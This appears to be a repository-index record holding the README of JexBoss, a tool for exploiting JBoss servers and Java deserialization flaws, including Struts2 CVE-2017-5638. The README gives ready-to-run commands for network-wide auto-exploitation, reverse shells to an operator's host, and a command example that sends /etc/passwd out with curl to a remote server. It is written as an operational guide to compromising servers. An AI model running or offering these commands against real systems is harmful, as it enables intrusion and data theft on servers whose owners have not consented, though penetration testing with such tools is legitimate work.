{"id":13816497,"url":"https://github.com/joaomatosf/jexboss","last_synced_at":"2025-05-15T15:32:39.986Z","repository":{"id":23960757,"uuid":"27342951","full_name":"joaomatosf/jexboss","owner":"joaomatosf","description":"JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool","archived":false,"fork":false,"pushed_at":"2020-01-21T13:29:54.000Z","size":4234,"stargazers_count":2422,"open_issues_count":29,"forks_count":638,"subscribers_count":95,"default_branch":"master","last_synced_at":"2024-11-19T13:38:26.878Z","etag":null,"topics":["deserialization","exploit","exploiting-vulnerabilities","gadget","javadeser","reverse-shell"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/joaomatosf.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2014-11-30T16:56:15.000Z","updated_at":"2024-11-18T23:14:32.000Z","dependencies_parsed_at":"2022-07-11T13:37:53.896Z","dependency_job_id":null,"html_url":"https://github.com/joaomatosf/jexboss","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joaomatosf%2Fjexboss","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joaomatosf%2Fjexboss/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joaomatosf%2Fjexboss/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joaomatosf%2Fjexboss/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/joaomatosf","download_url":"https://codeload.github.com/joaomatosf/jexboss/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254367689,"owners_count":22059556,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["deserialization","exploit","exploiting-vulnerabilities","gadget","javadeser","reverse-shell"],"created_at":"2024-08-04T05:00:43.578Z","updated_at":"2025-05-15T15:32:38.691Z","avatar_url":"https://github.com/joaomatosf.png","language":"Python","funding_links":[],"categories":["Python","Python (1887)"],"sub_categories":[],"readme":"JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool\n==============================================================================================\n\nJexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.\n\nRequirements\n----\n* Python \u003e= 2.7.x\n* [urllib3](https://pypi.python.org/pypi/urllib3)\n* [ipaddress](https://pypi.python.org/pypi/ipaddress)\n\nInstallation on Linux\\Mac\n-------------------------\nTo install the latest version of JexBoss, please use the following commands:\n\n\tgit clone https://github.com/joaomatosf/jexboss.git\n\tcd jexboss\n\tpip install -r requires.txt\n\tpython jexboss.py -h\n\tpython jexboss.py -host http://target_host:8080\n\n\tOR:\n\n\tDownload the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip\n\tunzip master.zip\n\tcd jexboss-master\n\tpip install -r requires.txt\n\tpython jexboss.py -h\n\tpython jexboss.py -host http://target_host:8080\n\n\nIf you are using CentOS with Python 2.6, please install Python2.7.\nInstallation example of the Python 2.7 on CentOS using Collections Software scl:\n\n yum -y install centos-release-scl\n yum -y install python27\n scl enable python27 bash\n\nInstallation on Windows\n-----------------------\nIf you are using Windows, you can use the [Git Bash](https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1) to run the JexBoss. Follow the steps below:\n\n* Download and install [Python](https://www.python.org/downloads/release/python-2712/)\n* Download and install [Git for Windows](https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1)\n* After installing, run the Git for Windows and type the following commands:\n\n```\n PATH=$PATH:C:\\Python27\\\n PATH=$PATH:C:\\Python27\\Scripts\n git clone https://github.com/joaomatosf/jexboss.git\n cd jexboss\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n \n```\n\nFeatures\n----\nThe tool and exploits were developed and tested for:\n\n* JBoss Application Server versions: 3, 4, 5 and 6.\n* Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)\n\nThe exploitation vectors are:\n\n* /admin-console\n\t- tested and working in JBoss versions 5 and 6\n* /jmx-console\n\t- tested and working in JBoss versions 4, 5 and 6\n* /web-console/Invoker\n\t- tested and working in JBoss versions 4, 5 and 6\n* /invoker/JMXInvokerServlet\n\t- tested and working in JBoss versions 4, 5 and 6\n* Application Deserialization\n - tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters\n* Servlet Deserialization\n - tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an \"Invoker\" in a link)\n* Apache Struts2 CVE-2017-5638\n - tested in Apache Struts 2 applications\n* Others\n\nVideos\n------\n\n* Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss\n\n[![Alt text](https://img.youtube.com/vi/VaLSYzEWgVE/0.jpg)](https://www.youtube.com/watch?v=VaLSYzEWgVE)\n\n* Exploiting JBoss Application Server with JexBoss\n\n[![Alt text](https://img.youtube.com/vi/yI54sRqFOyI/0.jpg)](https://www.youtube.com/watch?v=yI54sRqFOyI)\n\n* Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)\n\n[![Alt text](https://img.youtube.com/vi/PSRsVcfmRSg/0.jpg)](https://www.youtube.com/watch?v=PSRsVcfmRSg)\n\nScreenshots\n----\n\n* Simple usage examples:\n```\n$ python jexboss.py\n```\n![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/simple_usage_help.png)\n\n* Example of standalone mode against JBoss:\n```\n$ python jexboss.py -u http://192.168.0.26:8080\n```\n![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/standalone_mode1.png)\n![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/standalone_mode2.png)\n\n* Usage modes:\n```\n$ python jexboss.py -h\n```\n\n* Network scan mode:\n```\n$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt\n```\n![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/network_scan_mode.png)\n\n* Network scan with auto-exploit mode:\n```\n$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt\n```\n![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/scan_with_auto_exploit_mode.png)\n\n* Results and recommendations:\n\n![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/results_and_recommendations2.png)\n\n\nReverse Shell (meterpreter integration)\n---------------------------------------\nAfter you exploit a JBoss server, you can use the own jexboss command shell or perform a reverse connection using the following command:\n```\n jexremote=YOUR_IP:YOUR_PORT\n\n Example:\n Shell\u003ejexremote=192.168.0.10:4444\n```\n\n* Example:\n![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/jexbossreverse2.jpg)\n\nWhen exploiting java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute.\n\n\nUsage examples\n--------------\n\n* For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:\n```\n$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'\n```\n\n* For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):\n```\n$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name\n```\n\n* For Java Deserialization Vulnerabilities in a Servlet (like Invoker):\n```\n$ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize\n```\n\n* For Apache Struts 2 (CVE-2017-5638)\n```\n$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2\n```\n\n* For Apache Struts 2 (CVE-2017-5638) with cookies for authenticated resources\n```\n$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies \"JSESSIONID=24517D9075136F202DCE20E9C89D424D\"\n```\n\n* Auto scan mode:\n```\n$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log\n```\n\n* File scan mode:\n```\n$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log\n```\n\n* More Options:\n\n```\noptional arguments:\n -h, --help show this help message and exit\n --version show program's version number and exit\n --auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE\n PERMISSION!!!)\n --disable-check-updates, -D\n Disable two updates checks: 1) Check for updates\n performed by the webshell in exploited server at\n http://webshell.jexboss.net/jsp_version.txt and 2)\n check for updates performed by the jexboss client at\n http://joaomatosf.com/rnp/releases.txt\n -mode {standalone,auto-scan,file-scan}\n Operation mode (DEFAULT: standalone)\n --app-unserialize, -j\n Check for java unserialization vulnerabilities in HTTP\n parameters (eg. javax.faces.ViewState, oldFormData,\n etc)\n --servlet-unserialize, -l\n Check for java unserialization vulnerabilities in\n Servlets (like Invoker interfaces)\n --jboss Check only for JBOSS vectors.\n --jenkins Check only for Jenkins CLI vector.\n --jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat\n (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be\n checked by default.\n --proxy PROXY, -P PROXY\n Use a http proxy to connect to the target URL (eg. -P\n http://192.168.0.1:3128)\n --proxy-cred LOGIN:PASS, -L LOGIN:PASS\n Proxy authentication credentials (eg -L name:password)\n --jboss-login LOGIN:PASS, -J LOGIN:PASS\n JBoss login and password for exploit admin-console in\n JBoss 5 and JBoss 6 (default: admin:admin)\n --timeout TIMEOUT Seconds to wait before timeout connection (default 3)\n\nStandalone mode:\n -host HOST, -u HOST Host address to be checked (eg. -u\n http://192.168.0.10:8080)\n\nAdvanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):\n --reverse-host RHOST:RPORT, -r RHOST:RPORT\n Remote host address and port for reverse shell when\n exploiting Java Deserialization Vulnerabilities in\n application layer (for now, working only against *nix\n systems)(eg. 192.168.0.10:1331)\n --cmd CMD, -x CMD Send specific command to run on target (eg. curl -d\n @/etc/passwd http://your_server)\n --windows, -w Specifies that the commands are for rWINDOWS System$\n (cmd.exe)\n --post-parameter PARAMETER, -H PARAMETER\n Specify the parameter to find and inject serialized\n objects into it. (egs. -H javax.faces.ViewState or -H\n oldFormData (\u003c- Hi PayPal =X) or others) (DEFAULT:\n javax.faces.ViewState)\n --show-payload, -t Print the generated payload.\n --gadget {commons-collections3.1,commons-collections4.0,groovy1}\n Specify the type of Gadget to generate the payload\n automatically. (DEFAULT: commons-collections3.1 or\n groovy1 for JenKins)\n --load-gadget FILENAME\n Provide your own gadget from file (a java serialized\n object in RAW mode)\n --force, -F Force send java serialized gadgets to URL informed in\n -u parameter. This will send the payload in multiple\n formats (eg. RAW, GZIPED and BASE64) and with\n different Content-Types.\n\nAuto scan mode:\n -network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8)\n -ports PORTS List of ports separated by commas to be checked for\n each host (eg. 8080,8443,8888,80,443)\n -results FILENAME File name to store the auto scan results\n\nFile scan mode:\n -file FILENAME_HOSTS Filename with host list to be scanned (one host per\n line)\n -out FILENAME_RESULTS\n File name to store the file scan results\n\n```\n\n\nQuestions, problems, suggestions and etc:\n----\n\n* joaomatosf@gmail.com\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjoaomatosf%2Fjexboss","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjoaomatosf%2Fjexboss","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjoaomatosf%2Fjexboss/lists"}